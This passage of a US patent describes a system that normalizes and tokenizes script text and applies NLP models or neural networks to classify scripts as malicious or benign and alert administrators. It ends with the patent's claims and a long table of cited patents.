For example, the normalized script text 355, including the plurality of analytic tokens, may be processed by a NLP machine learning model 365. Herein, the normalized script text 355 undergo N-gram or Skip-Gram modeling 366 (N≥1) which, using a sliding window, generates the set of model-adapted tokens 367 corresponding to each analytic token or a multiple (two or more) analytic tokens. For instance, when N=1, each analytic token is analyzed independently, while N=2 two analytic tokens are analyzed collectively as a model-adapted token. Skip Gram may allow more flexibility on token combinations. For example, analytic tokens “A B C D,” using Skip Gram of (skip=1, N=2), produces analytic token combinations operating as model-adapted tokens (A B), (A C), (B C), (B D), and (C D). This flexibility increases the detection capability of finding more sophisticated patterns, while also increasing the computation demands.

Thereafter, each of the set of model-adapted tokens 367 may undergo a weighting 368. The weighting 368 may be used to (i) increase the level of reliance on a token that is more demonstrative in accurately predicting an classification of a subscript as malicious or benign and (ii) decrease the level of reliance on the token that, historically, has had a lesser correlation with malicious or benign scripts.

Thereafter, each model-adapted token undergoes a classification 369 by determining, during modeling, whether the model-adapted token is correlated to any labeled malicious and benign tokens and assigning a weighted prediction score to that model-adapted token. A selected combination of some or all of these weighted, prediction scores (e.g., an aggregate of the prediction scores) may signify a likelihood of maliciousness for the script. The likelihood of maliciousness is compared to one or more specified thresholds (e.g., a first threshold for malicious classification, a second threshold for benign classification, etc.).

Alternatively, in lieu of conducting the modeling phase 360 using the NLP model 365 described above, the NLP modeling phase 360 may be performed by a neural network 370, such as a RNN 371 or CNN 372 for example, which operates on an input based directly on the normalized script text 355. The operations of the neural network 370 are pre-trained (conditioned) using labeled training sets of tokens from malicious and/or benign scripts in order to identify text, especially within analytic tokens, that are probative of how the script should be classified. Communicatively coupled to and functioning in concert with the neural network 370 (e.g., CNN 372), a classifier 373, operating in accordance with a set of classification rules, receives an output from the CNN 372 and determines a classification assigned to the analytic tokens within the normalized script text 355 indicating whether the script associated with these analyzed token is malicious or benign.

Similar to operations of the ML model 365, a selected prediction score(s) produced by the classifier 373 (e.g., an aggregate of the prediction scores or a final prediction score) may signify a likelihood of maliciousness for the script. The likelihood of maliciousness is compared to one or more specified thresholds to determine a malicious classification or a benign classification. The usage of neural networks 370 during the NLP modeling phase 360 may be available where the enhanced malware detection system is located as part of a public or private cloud service when substantially greater processing and memory capacity is available than the agent deployment.

D. Data Output Phase

During the data output phase 380, upon receipt of a prediction score identifying a subscript is malicious, alert message 168 (e.g., email message, text message, automated phone call, dashboard (computer screen) notification, etc.) may be issued to an administrator identifying the cybersecurity threat. The alert message 168 may include the prediction score for the script along with a description that lists the rationale supporting the prediction score. The description may list the strong indicators (i.e., tokens) having demonstrative effect in classifying the script as malicious or benign. Furthermore, the description may list certain command arguments within the meta-information that are typical evasion techniques to run a process in the background and bypass execution policy, and thus strong indicators of a cyberattack.

Referring now to FIGS. 4A-4B, an illustrative embodiment of a flowchart outlining the operations conducted by the enhanced malware detection system of FIGS. 1-2 is shown. Upon receipt of the script for analysis, a determination is made whether a portion of text forming the script is encoded (item 400). If the script features no encoded text, the enhanced malware detection system performs tokenization of the script text as described below (item 405). However, if a portion of the script text is encoded, the enhanced malware detection system analyzes the script text and/or meta-information associated with the script to determine the encoding scheme used to encode the portion of the script (item 410). If the encoding scheme cannot be determined, the analysis of the script is halted, where an alert message may be generated to identify the script and a notification that the script is encoded as represented by the dashed lines (item 415). Execution of the script may be terminated as well to protect the network device. Alternatively, if the encoding scheme can be determined, the encoded text portion of the script is decoded so that the entire script is in a non-encoded format, referred to as “decoded script text” (item 420).

As shown in FIG. 4A, the decoded script text undergoes a tokenization operation to segment the decoded script text into analytic tokens for handling by the NLP model during the NLP modeling phase (item 425). Additionally, the decoded script text, namely the analytic tokens, undergo a normalization operation to produce normalized script text. The normalization operation may include stemmer operations including alteration of the syntax of the decoded script text by substitution of at least one sequence of characters (i.e., one or more characters represented by one or more letters, numbers or symbols) with another (preferably shorter) sequence of characters. Additionally, or in the alternative, the normalization operation may include text reconstruction through removal of sequences of characters (e.g., words) absent from a vocabulary data store. The vocabulary data store includes content (e.g., characters, words, etc.) having significance in the classification of the script (item 430).

After generation of the normalized script text, as shown in FIG. 4B, one or more NLP models is applied to the normalized script text to produce a prediction score for tokens processed by the NLP model (item 435). The classification of the script may be determined based, at least in part, on the prediction score that represents the level of maliciousness of the script (item 440). According to one embodiment of the disclosure, the script may be determined as malicious based on the correlation between the prediction score (with any weighting applied) to a first threshold for malicious classification or a second threshold for benign classification for example (item 445). If the script is determined to be malicious, a description directed to a justification for the malicious designation (e.g., listing of more demonstrative tokens or other factors) is automatically produced (item 450) and an alert message, including the script, classification for the script, and the description for example, is generated for transmission to an administrator (item 455). Otherwise, the analysis of the script concludes where the benign or non-determinative (suspicious) result may or may not be provided to an administrator (item 460).

In the foregoing description, the invention is described with reference to specific exemplary embodiments thereof. It will, however, be evident that various modifications and changes may be made thereto without departing from the broader spirit and scope of the invention as set forth in the appended claims, For instance, the order of the above-identified operations and even the performance of some or all of the above-identified operations are not required for the invention unless explicitly claimed. Furthermore, other aspects of the invention can be practiced using other NLP processing and/or modeling techniques to analyze scripts and determine whether such scripts are part of a cyberattack.

Claims

1. A computerized method for detecting a cyberattack on a network device, the method comprising: receiving script text including a first plurality of characters;performing a normalization operation on the script text to produce a normalized script text having a second plurality of characters being less than the first plurality of characters, the normalized script text including a plurality of analytic tokens each being an instance of a sequence of characters grouped together as a useful semantic unit for natural language processing (NLP);applying, by modeling logic, a NLP model to the normalized script text to generate a set of tokens for use by a classifier, the classifier being configured to correlate the set of tokens with tokens associated with a corpus of at least known malicious scripts and classify a script associated with the script text as malicious or benign; andresponsive to the script being classified as malicious, generating an alert message provided to an administrator to identify the malicious script.
2. The computerized method of claim 1, wherein the receiving of the script text comprises detecting a script running as a process on the network device and obtaining the script text from the script.
3. The computerized method of claim 1, wherein the performing of the normalization operation on the script text comprises determining whether at least a first portion of the script text is encoded;responsive to determining that the at least first portion of the script text is encoded, determining an encoding scheme used to encode the at least first portion of the script text; andupon determining the encoding scheme, decoding the at least first portion of the script text so that the script text undergoing the normalization operation features no encoded text.
4. The computerized method of claim 3, wherein the normalization operation on the script text comprises inserting a prefix before each analytic token of the plurality of analytic tokens corresponding to the decoded first portion of the script text, the prefix being a symbol signaling the NLP model to increase a scrutiny of analysis associated with each analytic token following the prefix.
5. The computerized method of claim 3, wherein the performing of the normalization operation on the script text further comprises performing a tokenization operation on the script text after decoding the at least first portion of the script text to produce the plurality of analytic tokens.
6. The computerized method of claim 5, wherein the performing of the normalization operation on the script text further comprises performing a stemmer operation on the plurality of analytic tokens of the script text to simplify a syntax associated with the plurality of analytic tokens, the stemmer operation being conducted in accordance with a prefix tree.
7. The computerized method of claim 6, wherein the performing of the normalization operation on the script text further comprises updating a vocabulary data store utilized during the normalization operation on the script text with one or more sequences of characters from the script text that arise to a predetermined level of significance for use in classification of the script, the predetermined level of significance being determined in accordance with a frequency of occurrence in the script text of the one or more sequences of characters.
8. The computerized method of claim 7, wherein the predetermined level of significance being determined in accordance with term frequency-inverse document frequency (tf-idf).
9. The computerized method of claim 7, wherein the performing of the normalization operation on the script text further comprises reconstructing the script text to produce the normalized script by at least removing one or more words from the script so that the plurality of analytic tokens include words only stored in the vocabulary data store.
10. The computerized method of claim 1, wherein the applying of the NLP model to the normalized script text includes generating the set of tokens corresponding to model-adapted tokens, from the plurality of analytic tokens, and applying the NLP model to the model-adapted tokens to produce a prediction score representing a level of maliciousness of the script.
11. The computerized method of claim 1, wherein the applying of the NLP model to the normalized script text includes analyzing each of the plurality of analytic tokens after normalization using a neural network trained using the tokens associated with the corpus of at least known malicious scripts being labeled training sets of malicious tokens in order to identify any of the plurality of analytic tokens probative in classifying the script and the classifier communicatively coupled to the neural network to classify the script in accordance with a set of classification rules.
12. A computerized method for detecting a cyberattack on a network device, the method comprising: receiving script text as input;performing, by normalization logic, a normalization operation on the script text to produce a normalized script text, the normalized script text including a plurality of analytic tokens each being an instance of a sequence of characters grouped together as a useful semantic unit for natural language processing (NLP);applying, by modeling logic, a NLP model to the normalized script text to generate a set of tokens; andclassifying, by a classifier, a script associated with the script text as malicious or benign based on at least a correlation between the set of tokens and tokens associated with a corpus of known malicious scripts,wherein each of the normalization logic, the modeling logic and the classifier is software that is stored in one or more non-transitory storage mediums.
13. The computerized method of claim 12, wherein the performing of the normalization operation on the script text comprises determining whether at least a first portion of the script text is encoded; andresponsive to determining that the at least first portion of the script text is encoded, determining an encoding scheme used to encode the at least first portion of the script text and decoding the at least first portion of the script text based on a decoding scheme to counter the encoding scheme.
14. The computerized method of claim 12, wherein the normalization operation on the script text comprises (i) decoding at least a first portion of the script text being encoded and (ii) inserting a prefix before each analytic token of the plurality of analytic tokens corresponding to the decoded first portion of the script text, the prefix being a symbol signaling the NLP model to increase a scrutiny of analysis associated with each analytic token following the prefix.
15. The computerized method of claim 12, wherein the performing of the normalization operation on the script text further comprises performing a tokenization operation on the script text after decoding any encoded portions of the script text to produce the plurality of analytic tokens.
16. The computerized method of claim 15, wherein the performing of the normalization operation on the script text further comprises performing a stemmer operation on the plurality of analytic tokens of the script text to simplify syntax associated with the plurality of analytic tokens, the stemmer operation being conducted in accordance with a prefix tree.
17. The computerized method of claim 15, wherein the receiving of the script includes receiving a shell script entered via a command line interface or graphical user interface.
18. A network device, comprising: one or more hardware processors; anda non-transitory storage medium communicatively coupled to the one or more hardware processors, the non-transitory storage medium comprises a software agent including a monitoring software component configured to detect a script and obtain script text associated with the script,an analysis software component configured to process the script text and generate a plurality of analytic tokens based on the script text,a modeling software component configured to generate a set of tokens based on the plurality of analytic tokens for use by a classifier to (i) correlate the set of tokens with tokens associated with a corpus of at least known malicious scripts and (ii) classify the script associated with the script text as malicious or benign, andreporting logic configured to generate an alert message provided to an administrator responsive to the script being classified as malicious.
19. The network device of claim 18, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform a normalization operation on the script text to produce a normalized script text including a second plurality of characters being less than a first plurality of characters forming the script text, the normalized script text including the plurality of analytic tokens each being an instance of a sequence of characters grouped together as a useful semantic unit for natural language processing (NLP).
20. The network device of claim 19, wherein the modeling software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to apply a NLP model to the normalized script text to classify the script.
21. The network device of claim 20, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform the normalization operation by at least determining whether at least a first portion of the script text is encoded;responsive to determining that the at least first portion of the script text is encoded, determining an encoding scheme used to encode the at least first portion of the script text; andupon determining the encoding scheme, decoding the at least first portion of the script text so that the script text undergoing the normalization operation features no encoded text.
22. The network device of claim 21, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to further perform the normalization operation by at least inserting a prefix before each analytic token of the plurality of analytic tokens corresponding to the decoded first portion of the script text, the prefix being a symbol signaling the NLP model to increase a scrutiny of analysis associated with each analytic token following the prefix.
23. The network device of claim 21, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform the normalization operation that further comprises performing a tokenization operation on the script text after the decoding of the at least first portion of the script text to produce the plurality of analytic tokens.
24. The network device of claim 23, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform the normalization operation that further comprises performing a stemmer operation on the plurality of analytic tokens of the script text to simplify a syntax associated with the plurality of analytic tokens, the stemmer operation being conducted in accordance with a prefix tree.
25. The network device of claim 24, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform the normalization operation that further comprises updating a vocabulary data store utilized during the normalization operation on the script text with one or more sequences of characters from the script text that arise to a predetermined level of significance for use in classification of the script, the predetermined level of significance being determined in accordance with a frequency of occurrence in the script text of the one or more sequences of characters.
26. The network device of claim 25, wherein the analysis software component, deployed as part of the software agent, upon execution by the one or more hardware processors, to perform the normalization operation that further comprises reconstructing the script text to produce the normalized script by at least removing one or more words from the script so that the plurality of analytic tokens include words only stored in the vocabulary data store.
27. The network device of claim 20, wherein the modeling software component, deployed as part of the software agent, upon execution by the one or more hardware processors, applying the NLP model to the normalized script text to at least generate generating model-adapted tokens corresponding to the set of tokens, from the plurality of analytic tokens, and applying the NLP model to the model-adapted tokens to produce a prediction score representing a level of maliciousness of the script.
28. The network device of claim 20, wherein the modeling software component, deployed as part of the software agent, upon execution by the one or more hardware processors, applying of the NLP model to the normalized script text by at least analyzing each of the plurality of analytic tokens after normalization using a neural network trained using the tokens associated with the corpus of at least known malicious scripts corresponding to labeled training sets of malicious tokens in order to identify any of the plurality of analytic tokens probative in classifying the script and the classifier communicatively coupled to the neural network to classify the script in accordance with a set of classification rules.
29. A non-transitory storage medium including a software agent that, upon execution by one or more hardware processors, automatically detects a script and classifies the script as malicious or benign, comprising: a monitoring software component configured to detect a script and obtain script text associated with the script;an analysis software component configured to process the script text and generate a plurality of analytic tokens based on the script text;a modeling software component configured to generate a set of tokens based on the plurality of analytic tokens for use by a classifier to (i) correlate the set of tokens with tokens associated with a corpus of at least known malicious scripts and (ii) classify the script associated with the script text as malicious or benign; anda reporting software component configured to generate an alert message provided to an administrator responsive to the script being classified as malicious.
30. The computerized method of claim 1, wherein the classifier is further configured to correlate the set of tokens with tokens associated with a corpus of known benign scripts and the classifier to assign prediction scores to the set of token, the predictive scores collectively representing a likelihood of the script text being associated with a cyberattack.
31. The non-transitory storage medium of claim 29, wherein the analysis software component, deployed as part of the software agent, to perform a normalization operation on the script text to produce a normalized script text including a second plurality of characters being less than a first plurality of characters forming the script text, the normalized script text including the plurality of analytic tokens each being an instance of a sequence of characters grouped together as a useful semantic unit for natural language processing (NLP).
32. The non-transitory storage medium of claim 29, wherein the modeling software component, deployed as part of the software agent, to apply a NLP model to the normalized script text to classify the script.
33. The non-transitory storage medium of claim 32, wherein the analysis software component, deployed as part of the software agent, to perform the normalization operation by at least determining whether at least a first portion of the script text is encoded;responsive to determining that the at least first portion of the script text is encoded, determining an encoding scheme used to encode the at least first portion of the script text; andupon determining the encoding scheme, decoding the at least first portion of the script text so that the script text undergoing the normalization operation features no encoded text.
34. The non-transitory storage medium of claim 33, wherein the analysis software component, deployed as part of the software agent, to further perform the normalization operation by at least inserting a prefix before each analytic token of the plurality of analytic tokens corresponding to the decoded first portion of the script text, the prefix being a symbol signaling the NLP model to increase a scrutiny of analysis associated with each analytic token following the prefix.
35. The non-transitory storage medium of claim 33, wherein the analysis software component, deployed as part of the software agent, to perform the normalization operation that further comprises performing a tokenization operation on the script text after the decoding of the at least first portion of the script text to produce the plurality of analytic tokens.
36. The non-transitory storage medium of claim 35, wherein the analysis software component, deployed as part of the software agent, to perform the normalization operation that further comprises performing a stemmer operation on the plurality of analytic tokens of the script text to simplify a syntax associated with the plurality of analytic tokens, the stemmer operation being conducted in accordance with a prefix tree.
37. The non-transitory storage medium of claim 36, wherein the analysis software component, deployed as part of the software agent, to perform the normalization operation that further comprises updating a vocabulary data store utilized during the normalization operation on the script text with one or more sequences of characters from the script text that arise to a predetermined level of significance for use in classification of the script, the predetermined level of significance being determined in accordance with a frequency of occurrence in the script text of the one or more sequences of characters.
38. The non-transitory storage medium of claim 37, wherein the analysis software component, deployed as part of the software agent, to perform the normalization operation that further comprises reconstructing the script text to produce the normalized script by at least removing one or more words from the script so that the plurality of analytic tokens include words only stored in the vocabulary data store.
39. The non-transitory storage medium of claim 32, wherein the modeling software component, deployed as part of the software agent, applying of the NLP model to the normalized script text to at least generate generating model-adapted tokens corresponding to the set of tokens, from the plurality of analytic tokens, and applying the NLP model to the model- adapted tokens to produce a prediction score representing a level of maliciousness of the script.
40. The non-transitory storage medium of claim 32, wherein the modeling software component, deployed as part of the software agent, applying of the NLP model to the normalized script text by at least analyzing each of the plurality of analytic tokens after normalization using a neural network trained using the tokens associated with the corpus of at least known malicious scripts corresponding to labeled training sets of malicious tokens in order to identify any of the plurality of analytic tokens probative in classifying the script and the classifier communicatively coupled to the neural network to classify the script in accordance with a set of classification rules.

CROSS-REFERENCE TO RELATED APPLICATIONS

This application claims the benefit of priority on U.S. Provisional Application No. 62/650,860, filed Mar. 30, 2018, the entire contents of which are incorporated by reference herein.

US Referenced Citations (713)

Number	Name	Date	Kind
4292580	Ott et al.	Sep 1981	A
5175732	Hendel et al.	Dec 1992	A
5319776	Hile et al.	Jun 1994	A
5440723	Arnold et al.	Aug 1995	A
5490249	Miller	Feb 1996	A
5657473	Killean et al.	Aug 1997	A
5802277	Cowlard	Sep 1998	A
5842002	Schnurer et al.	Nov 1998	A
5960170	Chen et al.	Sep 1999	A
5978917	Chi	Nov 1999	A
5983348	Ji	Nov 1999	A
6088803	Tso et al.	Jul 2000	A
6092194	Touboul	Jul 2000	A
6094677	Capek et al.	Jul 2000	A
6108799	Boulay et al.	Aug 2000	A
6154844	Touboul et al.	Nov 2000	A
6269330	Cidon et al.	Jul 2001	B1
6272641	Ji	Aug 2001	B1
6279113	Vaidya	Aug 2001	B1
6298445	Shostack et al.	Oct 2001	B1
6357008	Nachenberg	Mar 2002	B1
6424627	Sorhaug et al.	Jul 2002	B1
6442696	Wray et al.	Aug 2002	B1
6484315	Ziese	Nov 2002	B1
6487666	Shanklin et al.	Nov 2002	B1
6493756	O'Brien et al.	Dec 2002	B1
6550012	Villa et al.	Apr 2003	B1
6775657	Baker	Aug 2004	B1
6831893	Ben Nun et al.	Dec 2004	B1
6832367	Choi et al.	Dec 2004	B1
6895550	Kanchirayappa et al.	May 2005	B2
6898632	Gordy et al.	May 2005	B2
6907396	Muttik et al.	Jun 2005	B1
6941348	Petry et al.	Sep 2005	B2
6971097	Wallman	Nov 2005	B1
6981279	Arnold et al.	Dec 2005	B1
7007107	Ivchenko et al.	Feb 2006	B1
7028179	Anderson et al.	Apr 2006	B2
7043757	Hoefelmeyer et al.	May 2006	B2
7058822	Edery et al.	Jun 2006	B2
7069316	Gryaznov	Jun 2006	B1
7080407	Zhao et al.	Jul 2006	B1
7080408	Pak et al.	Jul 2006	B1
7093002	Wolff et al.	Aug 2006	B2
7093239	van der Made	Aug 2006	B1
7096498	Judge	Aug 2006	B2
7100201	Izatt	Aug 2006	B2
7107617	Hursey et al.	Sep 2006	B2
7159149	Spiegel et al.	Jan 2007	B2
7213260	Judge	May 2007	B2
7231667	Jordan	Jun 2007	B2
7240364	Branscomb et al.	Jul 2007	B1
7240368	Roesch et al.	Jul 2007	B1
7243371	Kasper et al.	Jul 2007	B1
7249175	Donaldson	Jul 2007	B1
7287278	Liang	Oct 2007	B2
7308716	Danford et al.	Dec 2007	B2
7328453	Merkle, Jr. et al.	Feb 2008	B2
7346486	Ivancic et al.	Mar 2008	B2
7356736	Natvig	Apr 2008	B2
7386888	Liang et al.	Jun 2008	B2
7392542	Bucher	Jun 2008	B2
7418729	Szor	Aug 2008	B2
7428300	Drew et al.	Sep 2008	B1
7441272	Durham et al.	Oct 2008	B2
7448084	Apap et al.	Nov 2008	B1
7458098	Judge et al.	Nov 2008	B2
7464404	Carpenter et al.	Dec 2008	B2
7464407	Nakae et al.	Dec 2008	B2
7467408	O'Toole, Jr.	Dec 2008	B1
7478428	Thomlinson	Jan 2009	B1
7480773	Reed	Jan 2009	B1
7487543	Arnold et al.	Feb 2009	B2
7496960	Chen et al.	Feb 2009	B1
7496961	Zimmer et al.	Feb 2009	B2
7519990	Xie	Apr 2009	B1
7523493	Liang et al.	Apr 2009	B2
7530104	Thrower et al.	May 2009	B1
7540025	Tzadikario	May 2009	B2
7546638	Anderson et al.	Jun 2009	B2
7565550	Liang et al.	Jul 2009	B2
7568233	Szor et al.	Jul 2009	B1
7584455	Ball	Sep 2009	B2
7603715	Costa et al.	Oct 2009	B2
7607171	Marsden et al.	Oct 2009	B1
7639714	Stolfo et al.	Dec 2009	B2
7644441	Schmid et al.	Jan 2010	B2
7657419	van der Made	Feb 2010	B2
7676841	Sobchuk et al.	Mar 2010	B2
7698548	Shelest et al.	Apr 2010	B2
7707633	Danford et al.	Apr 2010	B2
7712136	Sprosts et al.	May 2010	B2
7730011	Deninger et al.	Jun 2010	B1
7739740	Nachenberg et al.	Jun 2010	B1
7779463	Stolfo et al.	Aug 2010	B2
7784097	Stolfo et al.	Aug 2010	B1
7832008	Kraemer	Nov 2010	B1
7836502	Zhao et al.	Nov 2010	B1
7849506	Dansey et al.	Dec 2010	B1
7854007	Sprosts et al.	Dec 2010	B2
7869073	Oshima	Jan 2011	B2
7877803	Enstone et al.	Jan 2011	B2
7904959	Sidiroglou et al.	Mar 2011	B2
7908660	Bahl	Mar 2011	B2
7930738	Petersen	Apr 2011	B1
7937387	Frazier et al.	May 2011	B2
7937761	Bennett	May 2011	B1
7949849	Lowe et al.	May 2011	B2
7996556	Raghavan et al.	Aug 2011	B2
7996836	McCorkendale et al.	Aug 2011	B1
7996904	Chiueh et al.	Aug 2011	B1
7996905	Arnold et al.	Aug 2011	B2
8006305	Aziz	Aug 2011	B2
8010667	Zhang et al.	Aug 2011	B2
8020206	Hubbard et al.	Sep 2011	B2
8028338	Schneider et al.	Sep 2011	B1
8042184	Batenin	Oct 2011	B1
8045094	Teragawa	Oct 2011	B2
8045458	Alperovitch et al.	Oct 2011	B2
8069484	McMillan et al.	Nov 2011	B2
8087086	Lai et al.	Dec 2011	B1
8171553	Aziz et al.	May 2012	B2
8176049	Deninger et al.	May 2012	B2
8176480	Spertus	May 2012	B1
8201246	Wu et al.	Jun 2012	B1
8204984	Aziz et al.	Jun 2012	B1
8214905	Doukhvalov et al.	Jul 2012	B1
8220055	Kennedy	Jul 2012	B1
8225288	Miller et al.	Jul 2012	B2
8225373	Kraemer	Jul 2012	B2
8233882	Rogel	Jul 2012	B2
8234640	Fitzgerald et al.	Jul 2012	B1
8234709	Viljoen et al.	Jul 2012	B2
8239944	Nachenberg et al.	Aug 2012	B1
8260914	Ranjan	Sep 2012	B1
8266091	Gubin et al.	Sep 2012	B1
8286251	Eker et al.	Oct 2012	B2
8291499	Aziz et al.	Oct 2012	B2
8307435	Mann et al.	Nov 2012	B1
8307443	Wang et al.	Nov 2012	B2
8312545	Tuvell et al.	Nov 2012	B2
8321936	Green et al.	Nov 2012	B1
8321941	Tuvell et al.	Nov 2012	B2
8332571	Edwards, Sr.	Dec 2012	B1
8365286	Poston	Jan 2013	B2
8365297	Parshin et al.	Jan 2013	B1
8370938	Daswani et al.	Feb 2013	B1
8370939	Zaitsev et al.	Feb 2013	B2
8375444	Aziz et al.	Feb 2013	B2
8381299	Stolfo et al.	Feb 2013	B2
8402529	Green et al.	Mar 2013	B1
8464340	Ahn et al.	Jun 2013	B2
8479174	Chiriac	Jul 2013	B2
8479276	Vaystikh et al.	Jul 2013	B1
8479291	Bodke	Jul 2013	B1
8510827	Leake et al.	Aug 2013	B1
8510828	Guo et al.	Aug 2013	B1
8510842	Amit et al.	Aug 2013	B2
8516478	Edwards et al.	Aug 2013	B1
8516590	Ranadive et al.	Aug 2013	B1
8516593	Aziz	Aug 2013	B2
8522348	Chen et al.	Aug 2013	B2
8528086	Aziz	Sep 2013	B1
8533824	Hutton et al.	Sep 2013	B2
8539582	Aziz et al.	Sep 2013	B1
8549638	Aziz	Oct 2013	B2
8555391	Demir et al.	Oct 2013	B1
8561177	Aziz et al.	Oct 2013	B1
8566476	Shiffer et al.	Oct 2013	B2
8566946	Aziz et al.	Oct 2013	B1
8584094	Dadhia et al.	Nov 2013	B2
8584234	Sobel et al.	Nov 2013	B1
8584239	Aziz et al.	Nov 2013	B2
8595834	Xie et al.	Nov 2013	B2
8627476	Satish et al.	Jan 2014	B1
8635696	Aziz	Jan 2014	B1
8682054	Xue et al.	Mar 2014	B2
8682812	Ranjan	Mar 2014	B1
8689333	Aziz	Apr 2014	B2
8695096	Zhang	Apr 2014	B1
8713631	Pavlyushchik	Apr 2014	B1
8713681	Silberman et al.	Apr 2014	B2
8726392	McCorkendale et al.	May 2014	B1
8739280	Chess et al.	May 2014	B2
8776229	Aziz	Jul 2014	B1
8782792	Bodke	Jul 2014	B1
8789172	Stolfo et al.	Jul 2014	B2
8789178	Kejriwal et al.	Jul 2014	B2
8793278	Frazier et al.	Jul 2014	B2
8793787	Ismael et al.	Jul 2014	B2
8805947	Kuzkin et al.	Aug 2014	B1
8806647	Daswani et al.	Aug 2014	B1
8832829	Manni et al.	Sep 2014	B2
8838992	Zhu	Sep 2014	B1
8850570	Ramzan	Sep 2014	B1
8850571	Staniford et al.	Sep 2014	B2
8881234	Narasimhan et al.	Nov 2014	B2
8881271	Butler, II	Nov 2014	B2
8881282	Aziz et al.	Nov 2014	B1
8898788	Aziz et al.	Nov 2014	B1
8935779	Manni et al.	Jan 2015	B2
8949257	Shiffer et al.	Feb 2015	B2
8984638	Aziz et al.	Mar 2015	B1
8990939	Staniford et al.	Mar 2015	B2
8990944	Singh et al.	Mar 2015	B1
8997219	Staniford et al.	Mar 2015	B2
9009822	Ismael et al.	Apr 2015	B1
9009823	Ismael et al.	Apr 2015	B1
9027135	Aziz	May 2015	B1
9071638	Aziz et al.	Jun 2015	B1
9104867	Thioux et al.	Aug 2015	B1
9106630	Frazier et al.	Aug 2015	B2
9106694	Aziz et al.	Aug 2015	B2
9118715	Staniford et al.	Aug 2015	B2
9159035	Ismael et al.	Oct 2015	B1
9171160	Vincent et al.	Oct 2015	B2
9176843	Ismael et al.	Nov 2015	B1
9189627	Islam	Nov 2015	B1
9195829	Goradia et al.	Nov 2015	B1
9197664	Aziz et al.	Nov 2015	B1
9223972	Vincent et al.	Dec 2015	B1
9225740	Ismael et al.	Dec 2015	B1
9241010	Bennett et al.	Jan 2016	B1
9251343	Vincent et al.	Feb 2016	B1
9262635	Paithane et al.	Feb 2016	B2
9268936	Butler	Feb 2016	B2
9275229	LeMasters	Mar 2016	B2
9282109	Aziz et al.	Mar 2016	B1
9292686	Ismael et al.	Mar 2016	B2
9294501	Mesdaq et al.	Mar 2016	B2
9300686	Pidathala et al.	Mar 2016	B2
9306960	Aziz	Apr 2016	B1
9306974	Aziz et al.	Apr 2016	B1
9311479	Manni et al.	Apr 2016	B1
9355247	Thioux et al.	May 2016	B1
9356944	Aziz	May 2016	B1
9363280	Rivlin et al.	Jun 2016	B1
9367681	Ismael et al.	Jun 2016	B1
9398028	Karandikar et al.	Jul 2016	B1
9413781	Cunningham et al.	Aug 2016	B2
9426071	Caldejon et al.	Aug 2016	B1
9430646	Mushtaq et al.	Aug 2016	B1
9432389	Khalid et al.	Aug 2016	B1
9438613	Paithane et al.	Sep 2016	B1
9438622	Staniford et al.	Sep 2016	B1
9438623	Thioux et al.	Sep 2016	B1
9459901	Jung et al.	Oct 2016	B2
9467460	Otvagin et al.	Oct 2016	B1
9483644	Paithane et al.	Nov 2016	B1
9495180	Ismael	Nov 2016	B2
9497213	Thompson et al.	Nov 2016	B2
9507935	Ismael et al.	Nov 2016	B2
9516057	Aziz	Dec 2016	B2
9519782	Aziz et al.	Dec 2016	B2
9536091	Paithane et al.	Jan 2017	B2
9537972	Edwards et al.	Jan 2017	B1
9560059	Islam	Jan 2017	B1
9565202	Kindlund et al.	Feb 2017	B1
9591015	Amin et al.	Mar 2017	B1
9591020	Aziz	Mar 2017	B1
9594904	Jain et al.	Mar 2017	B1
9594905	Ismael et al.	Mar 2017	B1
9594912	Thioux et al.	Mar 2017	B1
9609007	Rivlin et al.	Mar 2017	B1
9626509	Khalid et al.	Apr 2017	B1
9628498	Aziz et al.	Apr 2017	B1
9628507	Haq et al.	Apr 2017	B2
9633134	Ross	Apr 2017	B2
9635039	Islam et al.	Apr 2017	B1
9641546	Manni et al.	May 2017	B1
9654485	Neumann	May 2017	B1
9661009	Karandikar et al.	May 2017	B1
9661018	Aziz	May 2017	B1
9674298	Edwards et al.	Jun 2017	B1
9680862	Ismael et al.	Jun 2017	B2
9690606	Ha et al.	Jun 2017	B1
9690933	Singh et al.	Jun 2017	B1
9690935	Shiffer et al.	Jun 2017	B2
9690936	Malik et al.	Jun 2017	B1
9736179	Ismael	Aug 2017	B2
9740857	Ismael et al.	Aug 2017	B2
9747446	Pidathala et al.	Aug 2017	B1
9756074	Aziz et al.	Sep 2017	B2
9773112	Rathor et al.	Sep 2017	B1
9781144	Otvagin et al.	Oct 2017	B1
9787700	Amin et al.	Oct 2017	B1
9787706	Otvagin et al.	Oct 2017	B1
9792196	Ismael et al.	Oct 2017	B1
9824209	Ismael et al.	Nov 2017	B1
9824211	Wilson	Nov 2017	B2
9824216	Khalid et al.	Nov 2017	B1
9825976	Gomez et al.	Nov 2017	B1
9825989	Mehra et al.	Nov 2017	B1
9838408	Karandikar et al.	Dec 2017	B1
9838411	Aziz	Dec 2017	B1
9838416	Aziz	Dec 2017	B1
9838417	Khalid et al.	Dec 2017	B1
9846776	Paithane et al.	Dec 2017	B1
9876701	Caldejon et al.	Jan 2018	B1
9888016	Amin et al.	Feb 2018	B1
9888019	Pidathala et al.	Feb 2018	B1
9910988	Vincent et al.	Mar 2018	B1
9912644	Cunningham	Mar 2018	B2
9912681	Ismael et al.	Mar 2018	B1
9912684	Aziz et al.	Mar 2018	B1
9912691	Mesdaq et al.	Mar 2018	B2
9912698	Thioux et al.	Mar 2018	B1
9916440	Paithane et al.	Mar 2018	B1
9921978	Chan et al.	Mar 2018	B1
9934376	Ismael	Apr 2018	B1
9934381	Kindlund et al.	Apr 2018	B1
9946568	Ismael et al.	Apr 2018	B1
9954890	Staniford et al.	Apr 2018	B1
9973531	Thioux	May 2018	B1
10002252	Ismael et al.	Jun 2018	B2
10019338	Goradia et al.	Jul 2018	B1
10019573	Silberman et al.	Jul 2018	B2
10025691	Ismael et al.	Jul 2018	B1
10025927	Khalid et al.	Jul 2018	B1
10027689	Rathor et al.	Jul 2018	B1
10027690	Aziz et al.	Jul 2018	B2
10027696	Rivlin et al.	Jul 2018	B1
10033747	Paithane et al.	Jul 2018	B1
10033748	Cunningham et al.	Jul 2018	B1
